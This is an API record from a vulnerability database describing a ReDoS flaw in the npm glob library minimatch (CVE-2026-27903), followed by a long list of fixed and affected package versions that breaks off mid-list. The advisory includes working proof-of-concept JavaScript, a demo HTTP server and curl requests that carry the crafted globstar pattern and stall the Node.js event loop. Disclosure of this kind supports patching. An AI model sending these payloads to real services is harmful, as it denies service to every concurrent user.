Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/21276?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21276?format=api", "vulnerability_id": "VCID-q6uh-59pj-rfdp", "summary": "minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments\n### Summary\n\n`matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.\n\n---\n\n### Details\n\nThe vulnerable loop is in `matchOne()` at [`src/index.ts#L960`](https://github.com/isaacs/minimatch/blob/v10.2.2/src/index.ts#L960):\n\n```typescript\nwhile (fr < fl) {\n ..\n if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {\n ..\n return true\n }\n ..\n fr++\n}\n```\n\nWhen a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each `**` multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).\n\nThere is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning `false` on a non-matching input.\n\nMeasured timing with n=30 path segments:\n\n| k (globstars) | Pattern size | Time |\n|---------------|--------------|----------|\n| 7 | 36 bytes | ~154ms |\n| 9 | 46 bytes | ~1.2s |\n| 11 | 56 bytes | ~5.4s |\n| 12 | 61 bytes | ~9.7s |\n| 13 | 66 bytes | ~15.9s |\n\n---\n\n### PoC\n\nTested on minimatch@10.2.2, Node.js 20.\n\n**Step 1 -- inline script**\n\n```javascript\nimport { minimatch } from 'minimatch'\n\n// k=9 globstars, n=30 path segments\n// pattern: 46 bytes, default options\nconst pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'\nconst path = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'\n\nconst start = Date.now()\nminimatch(path, pattern)\nconsole.log(Date.now() - start + 'ms') // ~1200ms\n```\n\nTo scale the effect, increase k:\n\n```javascript\n// k=11 -> ~5.4s, k=13 -> ~15.9s\nconst k = 11\nconst pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'\nconst path = Array(30).fill('a').join('/')\nminimatch(path, pattern)\n```\n\nNo special options are required. This reproduces with the default `minimatch()` call.\n\n**Step 2 -- HTTP server (event loop starvation proof)**\n\nThe following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:\n\n```javascript\n// poc1-server.mjs\nimport http from 'node:http'\nimport { URL } from 'node:url'\nimport { minimatch } from 'minimatch'\n\nconst PORT = 3000\n\nconst server = http.createServer((req, res) => {\n const url = new URL(req.url, `http://localhost:${PORT}`)\n if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }\n\n const pattern = url.searchParams.get('pattern') ?? ''\n const path = url.searchParams.get('path') ?? ''\n\n const start = process.hrtime.bigint()\n const result = minimatch(path, pattern)\n const ms = Number(process.hrtime.bigint() - start) / 1e6\n\n res.writeHead(200, { 'Content-Type': 'application/json' })\n res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\\n')\n})\n\nserver.listen(PORT)\n```\n\nTerminal 1 -- start the server:\n```\nnode poc1-server.mjs\n```\n\nTerminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:\n```\ncurl \"http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa\" &\n```\n\nTerminal 3 -- while the attack is in-flight, send a benign request:\n```\ncurl -w \"\\ntime_total: %{time_total}s\\n\" \"http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz\"\n```\n\n**Observed output (Terminal 3):**\n```\n{\"result\":true,\"ms\":\"0\"}\n\ntime_total: 4.132709s\n```\n\nThe server reports `\"ms\":\"0\"` -- the legitimate request itself takes zero processing time. The 4+ second `time_total` is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:\n\n```\n{\"result\":true,\"ms\":\"0\"}\n\ntime_total: 0.001599s\n```\n\n---\n\n### Impact\n\nAny application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.", "aliases": [ { "alias": "CVE-2026-27903" }, { "alias": "GHSA-7r86-cg39-jmmj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1041980?format=api", "purl": "pkg:deb/debian/node-minimatch@9.0.7-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@9.0.7-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054011?format=api", "purl": "pkg:deb/debian/node-minimatch@9.0.7-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@9.0.7-1" }, { "url": "http://public2.vulnerablecode.io/api/packages/62802?format=api", "purl": "pkg:npm/minimatch@3.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/63551?format=api", "purl": "pkg:npm/minimatch@4.2.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/63547?format=api", "purl": "pkg:npm/minimatch@5.1.8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/63543?format=api", "purl": "pkg:npm/minimatch@6.2.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/63541?format=api", "purl": "pkg:npm/minimatch@7.4.8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/63539?format=api", "purl": "pkg:npm/minimatch@8.0.6", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/63536?format=api", "purl": "pkg:npm/minimatch@9.0.7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/63533?format=api", "purl": "pkg:npm/minimatch@10.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.2.3" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1054008?format=api", "purl": "pkg:deb/debian/node-minimatch@3.0.4%2B~3.0.3-1%2Bdeb11u2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@3.0.4%252B~3.0.3-1%252Bdeb11u2" }, { "url": "http://public2.vulnerablecode.io/api/packages/932417?format=api", "purl": "pkg:deb/debian/node-minimatch@3.0.4%2B~3.0.3-1%2Bdeb11u2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@3.0.4%252B~3.0.3-1%252Bdeb11u2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/932415?format=api", "purl": "pkg:deb/debian/node-minimatch@5.1.1%2B~5.1.2-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@5.1.1%252B~5.1.2-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054009?format=api", "purl": "pkg:deb/debian/node-minimatch@5.1.1%2B~5.1.2-1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@5.1.1%252B~5.1.2-1" }, { "url": "http://public2.vulnerablecode.io/api/packages/932418?format=api", "purl": "pkg:deb/debian/node-minimatch@9.0.3-6?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@9.0.3-6%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054010?format=api", "purl": "pkg:deb/debian/node-minimatch@9.0.3-6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@9.0.3-6" }, { "url": "http://public2.vulnerablecode.io/api/packages/155761?format=api", "purl": "pkg:npm/minimatch@0.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/155762?format=api", "purl": "pkg:npm/minimatch@0.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/155763?format=api", "purl": "pkg:npm/minimatch@0.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/155764?format=api", "purl": "pkg:npm/minimatch@0.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/155765?format=api", "purl": "pkg:npm/minimatch@0.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/155766?format=api", "purl": "pkg:npm/minimatch@0.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/155767?format=api", "purl": "pkg:npm/minimatch@0.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/155768?format=api", "purl": "pkg:npm/minimatch@0.1.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/155769?format=api", "purl": "pkg:npm/minimatch@0.1.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/155770?format=api", "purl": "pkg:npm/minimatch@0.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/155771?format=api", "purl": "pkg:npm/minimatch@0.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/155772?format=api", "purl": "pkg:npm/minimatch@0.2.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/155773?format=api", "purl": "pkg:npm/minimatch@0.2.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/155774?format=api", "purl": "pkg:npm/minimatch@0.2.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/155775?format=api", "purl": "pkg:npm/minimatch@0.2.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/155776?format=api", "purl": "pkg:npm/minimatch@0.2.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/155777?format=api", "purl": "pkg:npm/minimatch@0.2.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/155778?format=api", "purl": "pkg:npm/minimatch@0.2.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/155779?format=api", "purl": "pkg:npm/minimatch@0.2.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/155780?format=api", "purl": "pkg:npm/minimatch@0.2.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/155781?format=api", "purl": "pkg:npm/minimatch@0.2.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.12" }, { "url": "http://public2.vulnerablecode.io/api/packages/155782?format=api", "purl": "pkg:npm/minimatch@0.2.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.13" }, { "url": "http://public2.vulnerablecode.io/api/packages/155783?format=api", "purl": "pkg:npm/minimatch@0.2.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.14" }, { "url": "http://public2.vulnerablecode.io/api/packages/155784?format=api", "purl": "pkg:npm/minimatch@0.3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.3.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/155785?format=api", "purl": "pkg:npm/minimatch@0.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/155786?format=api", "purl": "pkg:npm/minimatch@1.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@1.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/155787?format=api", "purl": "pkg:npm/minimatch@2.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/155788?format=api", "purl": "pkg:npm/minimatch@2.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/155789?format=api", "purl": "pkg:npm/minimatch@2.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/155790?format=api", "purl": "pkg:npm/minimatch@2.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/155791?format=api", "purl": "pkg:npm/minimatch@2.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/155792?format=api", "purl": "pkg:npm/minimatch@2.0.5", 